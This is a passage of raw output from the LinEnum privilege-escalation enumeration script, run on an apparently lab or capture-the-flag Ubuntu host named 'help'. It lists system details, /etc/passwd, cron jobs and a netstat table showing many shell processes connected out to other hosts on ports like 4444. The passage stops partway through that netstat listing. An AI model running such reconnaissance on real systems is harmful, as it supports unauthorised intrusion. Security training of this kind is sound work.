
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.95[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Thu Feb  7 11:00:06 PST 2019
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018


[00;31m[-] Specific release information:[00m
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.5 LTS"
NAME="Ubuntu"
VERSION="16.04.5 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.5 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[00;31m[-] Hostname:[00m
help


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest
root             tty1                      Sun Jan 13 13:27:15 -0800 2019
help             pts/1    10.10.15.151     Thu Feb  7 10:24:45 -0800 2019


[00;31m[-] Who else is logged on:[00m
 11:00:06 up 40 min,  1 user,  load average: 0.94, 2.42, 2.96
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
help     pts/1    10.10.15.151     10:24    1:18   0.59s  0.59s -bash


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
uid=108(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=109(mysql) gid=117(mysql) groups=117(mysql)
uid=110(Debian-exim) gid=118(Debian-exim) groups=118(Debian-exim)


[00;31m[-] It looks like we have some admin users:[00m
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
help:x:1000:1000:help,,,:/home/help:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
Debian-exim:x:110:118::/var/spool/exim4:/bin/false


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Accounts that have recently used sudo:[00m
/home/help/.sudo_as_admin_successful


[00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x  3 root root 4.0K Nov 27 00:43 .
drwxr-xr-x 22 root root 4.0K Nov 28 09:18 ..
drwxr-xr-x  7 help help 4.0K Feb  7 10:59 help


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=help
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=help
SHLVL=2
LESSOPEN=| /usr/bin/lesspipe %s
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen


[00;31m[-] Current umask value:[00m
0000
u=rwx,g=rwx,o=rwx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Nov 27 05:55 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  670 Jun 22  2017 php
-rw-r--r--  1 root root  190 Nov 27 00:42 popularity-contest

/etc/cron.daily:
total 56
drwxr-xr-x  2 root root 4096 Nov 28 09:52 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  539 Jun 11  2018 apache2
-rwxr-xr-x  1 root root 1474 Jun 26  2018 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root 4125 Mar  2  2016 exim4-base
-rwxr-xr-x  1 root root  372 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  435 Nov 17  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Nov 27 00:39 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Nov 27 00:39 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Nov 27 00:41 .
drwxr-xr-x 93 root root 4096 Jan 13 13:19 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;31m[-] Jobs held by all users:[00m
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
@reboot /usr/local/bin/forever start /home/help/help/dist/bundle.js


[00;31m[-] Systemd timers:[00m
NEXT                         LEFT     LAST                         PASSED    UNIT                         ACTIVATES
Fri 2019-02-08 05:53:59 PST  18h left Thu 2019-02-07 10:20:02 PST  40min ago apt-daily.timer              apt-daily.service
Fri 2019-02-08 06:23:55 PST  19h left Thu 2019-02-07 10:20:02 PST  40min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Fri 2019-02-08 10:34:57 PST  23h left Thu 2019-02-07 10:34:57 PST  25min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
[2mEnable thorough tests to see inactive timers[00m


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
ens33     Link encap:Ethernet  HWaddr 00:50:56:b9:49:53  
          inet addr:10.10.10.121  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:4953/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:4953/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2546672 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2110119 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:413190460 (413.1 MB)  TX bytes:662974758 (662.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:16480 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16480 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1276388 (1.2 MB)  TX bytes:1276388 (1.2 MB)


[00;31m[-] ARP history:[00m
? (10.10.10.2) at 00:50:56:aa:9c:8d [ether] on ens33


[00;31m[-] Default route:[00m
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens33


[00;31m[-] Listening TCP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 10.10.10.121:22         10.10.15.252:42992      TIME_WAIT   -               
tcp        0      0 10.10.10.121:22         10.10.15.252:42990      TIME_WAIT   -               
tcp        0      0 10.10.10.121:22         10.10.15.252:42976      TIME_WAIT   -               
tcp        0      0 10.10.10.121:33614      10.10.12.10:5555        CLOSE_WAIT  1429/sh         
tcp        0      0 10.10.10.121:22         10.10.15.252:42994      TIME_WAIT   -               
tcp        0      0 10.10.10.121:22         10.10.15.252:42986      TIME_WAIT   -               
tcp        0      0 10.10.10.121:22         10.10.15.252:42974      TIME_WAIT   -               
tcp        0      0 10.10.10.121:54668      10.10.12.32:4444        ESTABLISHED 78467/sh        
tcp        0      0 10.10.10.121:45422      10.10.12.70:7979        ESTABLISHED 77344/sh        
tcp        0      0 10.10.10.121:50150      10.10.12.79:4444        ESTABLISHED 11670/bash      
tcp        0      0 10.10.10.121:22         10.10.15.252:42978      TIME_WAIT   -               
tcp        0      0 10.10.10.121:51352      10.10.16.88:4444        ESTABLISHED 4461/sh         
tcp        0      0 10.10.10.121:51604      10.10.12.219:7000       ESTABLISHED 4804/sh         
tcp        0      0 10.10.10.121:50680      10.10.13.138:1234       ESTABLISHED 77125/sh        
tcp        0      0 10.10.10.121:34624      10.10.12.241:443        ESTABLISHED 3942/sh         
tcp        0      0 10.10.10.121:43570      10.10.12.55:1337        CLOSE_WAIT  4209/sh         
tcp        0      0 10.10.10.121:22         10.10.15.252:42996      TIME_WAIT   -               
tcp        0      0 10.10.10.121:43738      10.10.12.55:1337        TIME_WAIT   -               
tcp        0      0 10.10.10.121:35406      10.10.16.88:80          TIME_WAIT   -               
tcp        0      0 10.10.10.121:22         10.10.12.158:47618      ESTABLISHED -               
tcp        0      0 10.10.10.121:22         10.10.15.151:35038      ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::3000                 :::*                    LISTEN      76994/nodejs    
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:41821      ESTABLISHED 76994/nodejs    
tcp6     157      0 10.10.10.121:3000       10.10.13.117:51739      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:35211      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.245:38558      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:53031       ESTABLISHED -               
tcp6     152      0 10.10.10.121:3000       10.10.13.117:45501      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:52385      ESTABLISHED 76994/nodejs    
tcp6     146      0 10.10.10.121:3000       10.10.13.117:44251      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:55287      ESTABLISHED 76994/nodejs    
tcp6       0    196 10.10.10.121:80         10.10.12.103:40114      ESTABLISHED -               
tcp6     149      0 10.10.10.121:3000       10.10.13.117:45399      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:60145      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:3000       10.10.13.210:58828      TIME_WAIT   -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:39547      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:46515       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.14.28:59928       TIME_WAIT   -               
tcp6       0      0 10.10.10.121:3000       10.10.13.210:58824      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:52199       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.208:38889      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:46747       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:36959       ESTABLISHED -               
tcp6     148      0 10.10.10.121:3000       10.10.13.117:44313      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.208:34455      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.14.66:54073       ESTABLISHED -               
tcp6     154      0 10.10.10.121:3000       10.10.13.117:53979      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.208:40215      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:56885       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:48245      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:54775       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:60647      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:3000       10.10.14.223:33721      ESTABLISHED 76994/nodejs    
tcp6     154      0 10.10.10.121:3000       10.10.13.117:58497      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.13.187:33176      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:32867       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.14.66:34849       FIN_WAIT2   -               
tcp6       0      0 10.10.10.121:80         10.10.12.208:58865      TIME_WAIT   -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:34881      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.76:42928       TIME_WAIT   -               
tcp6     152      0 10.10.10.121:3000       10.10.13.117:41689      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:45333      ESTABLISHED 76994/nodejs    
tcp6     153      0 10.10.10.121:3000       10.10.13.117:59357      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:33979       ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:51111      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.245:38562      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.241:47942      ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:47045       ESTABLISHED -               
tcp6     148      0 10.10.10.121:3000       10.10.13.117:39525      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.79:38830       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.14.66:39855       TIME_WAIT   -               
tcp6       0      0 10.10.10.121:3000       10.10.14.223:33746      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:50037       ESTABLISHED -               
tcp6     159      0 10.10.10.121:3000       10.10.13.117:42545      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:50557       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:52317      ESTABLISHED 76994/nodejs    
tcp6     146      0 10.10.10.121:3000       10.10.13.117:45031      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:32893      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:47645       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.14.66:57795       ESTABLISHED -               
tcp6     152      0 10.10.10.121:3000       10.10.13.117:35557      ESTABLISHED 76994/nodejs    
tcp6     149      0 10.10.10.121:3000       10.10.13.117:46475      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:60797      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:42221      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:36261      ESTABLISHED 76994/nodejs    
tcp6     153      0 10.10.10.121:3000       10.10.13.117:50493      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.245:38488      ESTABLISHED -               
tcp6     149      0 10.10.10.121:3000       10.10.13.117:51899      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:34347      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.13.187:33276      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42938       TIME_WAIT   -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:38269      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:56707       ESTABLISHED -               
tcp6     150      0 10.10.10.121:3000       10.10.13.117:43249      ESTABLISHED 76994/nodejs    
tcp6     159      0 10.10.10.121:3000       10.10.13.117:38509      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:45403       ESTABLISHED -               
tcp6     155      0 10.10.10.121:3000       10.10.13.117:35579      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:45965       ESTABLISHED -               
tcp6       0      0 10.10.10.121:3000       10.10.13.117:40751      FIN_WAIT2   -               
tcp6     149      0 10.10.10.121:3000       10.10.13.117:48563      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.16.88:50202       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:49739       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.13.187:33364      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42936       TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.55:46620       TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:39059       ESTABLISHED -               
tcp6     157      0 10.10.10.121:3000       10.10.13.117:57711      ESTABLISHED 76994/nodejs    
tcp6     148      0 10.10.10.121:3000       10.10.13.117:53757      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.12.208:47275      ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:58077       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.208:51407      TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42940       TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.13.138:32826      ESTABLISHED -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:37669      ESTABLISHED 76994/nodejs    
tcp6       0    460 10.10.10.121:80         10.10.13.187:33456      ESTABLISHED -               
tcp6       1      0 10.10.10.121:80         10.10.12.10:58430       CLOSE_WAIT  -               
tcp6     151      0 10.10.10.121:3000       10.10.13.117:58963      ESTABLISHED 76994/nodejs    
tcp6     150      0 10.10.10.121:3000       10.10.13.117:35349      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:49059      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:47707       ESTABLISHED -               
tcp6     161      0 10.10.10.121:3000       10.10.13.117:54011      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:58833       ESTABLISHED -               
tcp6     158      0 10.10.10.121:3000       10.10.13.117:42293      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.170:49244      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:50577       ESTABLISHED -               
tcp6       0    196 10.10.10.121:80         10.10.12.208:59920      ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.208:37771      TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:59383       ESTABLISHED -               
tcp6     146      0 10.10.10.121:3000       10.10.13.117:44149      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:48973      ESTABLISHED 76994/nodejs    
tcp6     146      0 10.10.10.121:3000       10.10.13.117:48719      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.70:48392       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:48705       ESTABLISHED -               
tcp6     150      0 10.10.10.121:3000       10.10.13.117:58449      ESTABLISHED 76994/nodejs    
tcp6     154      0 10.10.10.121:3000       10.10.13.117:34613      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:48585      ESTABLISHED 76994/nodejs    
tcp6     152      0 10.10.10.121:3000       10.10.13.117:54501      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.13.33:34458       TIME_WAIT   -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:59637      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:58841       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:50317       ESTABLISHED -               
tcp6     148      0 10.10.10.121:3000       10.10.13.117:52709      ESTABLISHED 76994/nodejs    
tcp6     150      0 10.10.10.121:3000       10.10.13.117:50477      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:41759       ESTABLISHED -               
tcp6     149      0 10.10.10.121:3000       10.10.13.117:51209      ESTABLISHED 76994/nodejs    
tcp6       0      1 10.10.10.121:80         10.10.14.189:47550      LAST_ACK    -               
tcp6       0    140 10.10.10.121:80         10.10.12.208:45533      ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:60179       ESTABLISHED -               
tcp6     154      0 10.10.10.121:3000       10.10.13.117:41815      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.189:47552      SYN_RECV    -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:37197      ESTABLISHED 76994/nodejs    
tcp6     146      0 10.10.10.121:3000       10.10.13.117:36097      ESTABLISHED 76994/nodejs    
tcp6       1      0 10.10.10.121:80         10.10.14.245:37840      CLOSE_WAIT  -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:51497       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.13.33:34462       TIME_WAIT   -               
tcp6       0      0 10.10.10.121:80         10.10.15.6:35312        TIME_WAIT   -               
tcp6     146      0 10.10.10.121:3000       10.10.13.117:38183      ESTABLISHED 76994/nodejs    
tcp6     153      0 10.10.10.121:3000       10.10.13.117:53013      ESTABLISHED 76994/nodejs    
tcp6       0    140 10.10.10.121:80         10.10.14.66:35015       ESTABLISHED -               
tcp6     147      0 10.10.10.121:3000       10.10.13.117:34163      ESTABLISHED 76994/nodejs    
tcp6     150      0 10.10.10.121:3000       10.10.13.117:40867      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:41435      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.12.76:42930       TIME_WAIT   -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:40101       ESTABLISHED -               
tcp6       0    140 10.10.10.121:80         10.10.14.66:49151       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42932       TIME_WAIT   -               
tcp6     152      0 10.10.10.121:3000       10.10.13.117:52345      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:41533       ESTABLISHED -               
tcp6       0      0 10.10.10.121:80         10.10.12.76:42934       TIME_WAIT   -               
tcp6     159      0 10.10.10.121:3000       10.10.13.117:55577      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:39365      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:46005      ESTABLISHED 76994/nodejs    
tcp6     151      0 10.10.10.121:3000       10.10.13.117:60655      ESTABLISHED 76994/nodejs    
tcp6     159      0 10.10.10.121:3000       10.10.13.117:50565      ESTABLISHED 76994/nodejs    
tcp6       0      0 10.10.10.121:80         10.10.14.66:44379       ESTABLISHED -               
tcp6     154      0 10.10.10.121:3000       10.10.13.117:55709      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:37667      ESTABLISHED 76994/nodejs    
tcp6     147      0 10.10.10.121:3000       10.10.13.117:40981      ESTABLISHED 76994/nodejs    
tcp6     148      0 10.10.10.121:3000       10.10.13.117:56089      ESTABLISHED 76994/nodejs    
